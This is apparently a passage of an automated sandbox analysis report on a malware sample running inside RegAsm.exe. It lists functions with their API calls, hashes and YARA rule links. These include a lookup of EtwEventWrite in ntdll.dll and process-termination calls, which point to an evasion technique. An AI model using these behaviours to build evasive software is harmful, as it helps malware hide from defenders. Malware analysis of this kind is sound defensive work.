Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction ID: 9bbdd1ee4896165f6ac39e3e5efd8c25d27bca58a6bb0b57e2a538c7cae0429d
Opcode Fuzzy Hash: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction Fuzzy Hash: C9D012353C030477E1781B50BC5FF1A2934D7C5F02F201124F312580D046A41402963E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

EtwEventWrite, xrefs: 004018C5
ntdll.dll, xrefs: 004018B5

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction ID: fa0301676ac4a0b35d6f0bad7f9db5a069fcd374a286a1e4a3065c0da922a8bc
Opcode Fuzzy Hash: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction Fuzzy Hash: 84B09B7078020097CD1467756D5DF07766566457027506165A645D0160D77C5514551D

Function 6C522272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C52237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C522B9C

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 9560f83ec39200737c43f740b88804f973018fe53600fdba66546791564d54c6
Instruction ID: eb8bf42e15f23b814fbbd2d16631b03c21d1199147415a01aaf19e2738ee8977
Opcode Fuzzy Hash: 9560f83ec39200737c43f740b88804f973018fe53600fdba66546791564d54c6
Instruction Fuzzy Hash: A7E16E75A102058FDB08CF59CCD4A9EBBF2BF88324F198168E9095BB45D775EC85CB90

Function 6C560C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C560CD5

Part of subcall function 6C54F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C54F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C560D40
free.MOZGLUE ref: 6C560DCB

Part of subcall function 6C535E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C535EDB
Part of subcall function 6C535E90: memset.VCRUNTIME140(ewWl,000000E5,?), ref: 6C535F27
Part of subcall function 6C535E90: LeaveCriticalSection.KERNEL32(?), ref: 6C535FB2

free.MOZGLUE ref: 6C560DDD
free.MOZGLUE ref: 6C560DF2

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 1e162491b04aa5babdce2cb986f98e18213d583e917ccdcdff4db774ed01e2f5
Instruction ID: 85d88a49212605d79c0534761b67b9991fc2bf778956501e36cbd09ec9f89d25
Opcode Fuzzy Hash: 1e162491b04aa5babdce2cb986f98e18213d583e917ccdcdff4db774ed01e2f5
Instruction Fuzzy Hash: D941F7719097949BD720CF2AC84079AFBE5BFC5714F518A2EE8D887B50DB709845CB82

Function 6C569120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C568242,?,00000000,?,6C55B63F), ref: 6C569188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C568242,?,00000000,?,6C55B63F), ref: 6C5691BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C568242,?,00000000,?,6C55B63F), ref: 6C5691EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C568242,?,00000000,?,6C55B63F), ref: 6C569200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C568242,?,00000000,?,6C55B63F), ref: 6C569219

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 4ce41a94e2e434f8203c80a870c51d42a302055ef11ff83ba0693544a4936c3f
Instruction ID: a452cf350e2211ceceb58da76b8afaf7d4fa1389a09446b9b1c8eacd232eda89
Opcode Fuzzy Hash: 4ce41a94e2e434f8203c80a870c51d42a302055ef11ff83ba0693544a4936c3f
Instruction Fuzzy Hash: 96316531A016058FEB10CF69DC4876E73E9EF81314F624A79D856C7A60FB31E804CBA1

Function 6C550800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59E7DC), ref: 6C550838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C55084C
EnterCriticalSection.KERNEL32(?), ref: 6C5508AF
LeaveCriticalSection.KERNEL32(?), ref: 6C5508BD
LeaveCriticalSection.KERNEL32(6C59E7DC), ref: 6C5508D5

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 24bf05e5256c7c0f7445441cf66353b5db7ce99993c9d810a9eb2f4952f87506
Instruction ID: 7a6cd0e7c12900479af7f21b0e4f752a9b9a6dc5558f3cf2fdac0bbab6c5dd66
Opcode Fuzzy Hash: 24bf05e5256c7c0f7445441cf66353b5db7ce99993c9d810a9eb2f4952f87506
Instruction Fuzzy Hash: BF21FF31B012898BEF04DF65CC84BAE73B9FF84708F9105AAD909A7A40DF71A8148BD4

Function 6C56CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C55DA31,00100000,?,?,00000000,?), ref: 6C56CDA4

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

Part of subcall function 6C56D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C56CDBA,00100000,?,00000000,?,6C55DA31,00100000,?,?,00000000,?), ref: 6C56D158
Part of subcall function 6C56D130: InitializeConditionVariable.KERNEL32(00000098,?,6C56CDBA,00100000,?,00000000,?,6C55DA31,00100000,?,?,00000000,?), ref: 6C56D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C55DA31,00100000,?,?,00000000,?), ref: 6C56CDC4

Part of subcall function 6C567480: ReleaseSRWLockExclusive.KERNEL32(?,6C5715FC,?,?,?,?,6C5715FC,?), ref: 6C5674EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C55DA31,00100000,?,?,00000000,?), ref: 6C56CECC

Part of subcall function 6C52CA10: mozalloc_abort.MOZGLUE(?), ref: 6C52CAA2

Part of subcall function 6C55CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C56CEEA,?,?,?,?,00000000,?,6C55DA31,00100000,?,?,00000000), ref: 6C55CB57
Part of subcall function 6C55CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C55CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C56CEEA,?,?), ref: 6C55CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C55DA31,00100000,?,?,00000000,?), ref: 6C56D058

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 2da1cdf28a3d937073c34da7b84871b15a9e2705290ef9e774bf5159eabaf652
Instruction ID: a0f8b177f4574b1cf11b59573e01030f06e56e792b95c508e4d7c8296bb465d9
Opcode Fuzzy Hash: 2da1cdf28a3d937073c34da7b84871b15a9e2705290ef9e774bf5159eabaf652
Instruction Fuzzy Hash: FED17F71A04B46DFD708CF29C880B99F7E1BF89304F11866DD85987762EB31B9A5CB81

Function 6C521720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C5217B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C5218EE
free.MOZGLUE(?), ref: 6C521911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C52194C

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 25c8ef9850096c0f56e96d50e7cff33b409d3a2b131fc6d45e95ce7bf313ba6f
Instruction ID: 5bb2aaba2ab64a5fb77aa570aa1a248e4b455258590e8b97464f2238a533f670
Opcode Fuzzy Hash: 25c8ef9850096c0f56e96d50e7cff33b409d3a2b131fc6d45e95ce7bf313ba6f
Instruction Fuzzy Hash: B4818A70A152059BDB08CF68DC849AFBBF1FF89314B04466CE841AB794EB35AC44CBA1

Function 6C535C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C535D40
EnterCriticalSection.KERNEL32(6C59F688), ref: 6C535D67
__aulldiv.LIBCMT ref: 6C535DB4
LeaveCriticalSection.KERNEL32(6C59F688), ref: 6C535DED

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: e2597aaac2a020181bd60752f65045f1afe629a5f54b479225357cf9ddd563e5
Instruction ID: 90435ea3390246c1f0333050421e34b8ba19c839100f5cd2445dde2917cf9c21
Opcode Fuzzy Hash: e2597aaac2a020181bd60752f65045f1afe629a5f54b479225357cf9ddd563e5
Instruction Fuzzy Hash: 8B519F71E002698FCF08CF68CC44AAEBBB1FB85304F2B9A59E815A7750D7306D45CB90

Function 6C577170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C577250
EnterCriticalSection.KERNEL32(6C59F688), ref: 6C577277
__aulldiv.LIBCMT ref: 6C5772C4
LeaveCriticalSection.KERNEL32(6C59F688), ref: 6C5772F7

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 6ef246596edd817b495989aae92f083bd5405111c5a2ae75514344997a21fd6d
Instruction ID: 16a1eb3f02e6b91920800f77fd7df8e01aaa70036bb24cb743993a75a65d3f3a
Opcode Fuzzy Hash: 6ef246596edd817b495989aae92f083bd5405111c5a2ae75514344997a21fd6d
Instruction Fuzzy Hash: 0F516171E002698FCF19CFA8CC50AAEBBB1FB89304F1B4659E815A7750D7306D45CBA4

Function 6C51CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C51CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C51CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C51CF4E

Strings

0, xrefs: 6C51CF30

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: ed064aa15f0ac08c254cb5908a7e13e3f787b07dd5b83b252bd00b27ee0a2807
Instruction ID: 9dcebf8dffca5fbfd673b2675873fe15bfa78db29c801d41f83d28726fa47011
Opcode Fuzzy Hash: ed064aa15f0ac08c254cb5908a7e13e3f787b07dd5b83b252bd00b27ee0a2807
Instruction Fuzzy Hash: 1D511275A04216CFCB01CF18C890AAABBB5EF99300F198699D8595F751D732FD06CBE0

Function 6C5777D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5777FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C577829

Part of subcall function 6C54CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C5131A7), ref: 6C54CC45
Part of subcall function 6C54CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C5131A7), ref: 6C54CC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C57789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C5778CF

Part of subcall function 6C514DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C514E5A
Part of subcall function 6C514DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C514E97

Part of subcall function 6C514290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C553EBD,6C553EBD,00000000), ref: 6C5142A9

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: f1bb3146771c119ccd88c481f2d167850b84cc98e6c0672357a70c5c209b384b
Instruction ID: d25850740d43b2e861fdbae71a243f6feaedf1917bd5711236b058ef2c438a8b
Opcode Fuzzy Hash: f1bb3146771c119ccd88c481f2d167850b84cc98e6c0672357a70c5c209b384b
Instruction Fuzzy Hash: 1341C1719047469FD301DF29D88056AFBF4FFCA254F204A1DE4A987640DB70D989CBD2

Function 6C56DAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C56DB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C56DC0E
free.MOZGLUE(?), ref: 6C56DC2E
free.MOZGLUE(?), ref: 6C56DC40

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: d4058cfe114b7cd4448fc12e523c2e6c7b9cc6bb45de0b82db29975c7b8235bb
Instruction ID: 24fc824132aedba8e972f98f6b2fe3a8d37b2903ba6ea5a566281dce6d51da44
Opcode Fuzzy Hash: d4058cfe114b7cd4448fc12e523c2e6c7b9cc6bb45de0b82db29975c7b8235bb
Instruction Fuzzy Hash: FF4158756047008FC714CF36C888A5ABBF6BFC8354F55896DE89A87B60EB31E844CB51

Function 6C556470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C5582BC,?,?), ref: 6C55649B

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5564A9

Part of subcall function 6C54FA80: GetCurrentThreadId.KERNEL32 ref: 6C54FA8D
Part of subcall function 6C54FA80: AcquireSRWLockExclusive.KERNEL32(6C59F448), ref: 6C54FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C55653F
free.MOZGLUE(?), ref: 6C55655A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 3b8392c841f0a4c7aa1c4c64503d1d18e8780ca54eca75227bfe661163afac93
Instruction ID: ffe0015cb80d394a0d29f76d61120852d401353247ad7de332dfa535e43374ff
Opcode Fuzzy Hash: 3b8392c841f0a4c7aa1c4c64503d1d18e8780ca54eca75227bfe661163afac93
Instruction Fuzzy Hash: BD3170B5A043459FD704CF25D88069EB7E4FFC8314F41442EE85A97741EB34E918CB92

Function 0041BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041BDC5
_memmove.LIBCMT ref: 0041BDD9
_memmove.LIBCMT ref: 0041BE26
WriteFile.KERNEL32(00000000,?,66F5A7EA,?,00000000,03C12578,?,00000001,03C12578,?,0041AE6B,?,00000001,03C12578,66F5A7EA,?), ref: 0041BE45

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction ID: ef32b456043a7c40364d1b26fe1d6b34c9da03a70a3abd589478dda37aa5024c
Opcode Fuzzy Hash: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction Fuzzy Hash: FB318F75600704AFD765CF65E980BE7B7F8FB45740B40892FE94687A00DB74F9448B98

Function 004122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004122D7

Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
CloseHandle.KERNEL32(00000000), ref: 00412392

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
